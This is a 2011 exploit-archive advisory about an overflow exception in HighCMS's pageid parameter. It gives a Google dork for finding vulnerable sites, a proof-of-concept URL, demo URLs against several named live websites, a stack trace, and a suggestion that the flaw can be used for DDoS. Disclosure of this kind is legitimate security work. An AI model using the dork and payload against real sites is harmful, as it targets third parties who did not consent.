exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HighCMS Overflow

HighCMS Overflow
Posted Oct 30, 2011
Authored by BHG Security Center

HighCMS suffers from an overflow vulnerability when handling the pageid variable.

tags | exploit, overflow
SHA-256 | 93744a6c8c3f2e97056286c6fb6d441ee2dd84ef4497dc29022027a1079223e9

HighCMS Overflow

Change Mirror Download
----------------------------------------------------------------
HighCMS <= (index.aspx) Buffer Overflow Vulnerability
----------------------------------------------------------------

# Exploit Title:HighCMS <= (index.aspx) Buffer Overflow Vulnerability
# Google Dork: inurl:index.aspx?siteid=1&pageid=
# Application Name: [HighCMS]
# Date: 2011-10-30
# Author: BHG Security Center
# Home: Http://black-hg.org
# Software Link: [ http://www.aryanic.com/products-highcms.html ]
# Vendor Response(s): They didn't respond to the emails.
# Version: [ 11.6 ]
# Impact : [ Low ]
# Tested on: [Windows Server 2003 /IIS 6.0]
# CVE : Webapps

+-----------------------+
| Overflow Exception |
+-----------------------+

Description: You can use many of these vulnerabilities do Ddos attacks, including refref

# PoC(s):

http://[HOST]/index.aspx?siteid=1&pageid=[Overflow]

http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True

# Demo(s):

http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141

http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141

http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141

http://honarnews.org/index.aspx?siteid=1&pageid=4141414141

# Output Data:

[OverflowException: Arithmetic operation resulted in an overflow.]
Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165
highcms.index.page_select() +1272
highcms.index.make_page() +2304
highcms.index.Page_Load(Object , EventArgs ) +8725
System.Web.UI.Control.OnLoad(EventArgs e) +132
System.Web.UI.Control.LoadRecursive() +66
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428


# Reference:
[1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx)
[2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows)

# Important Notes:
- Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on.

# Greets To :

Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp

ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx

G3n3Rall ~ Mr.XHat ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter

s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ ./Persian Gulf

===========================================[End]=============================================
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close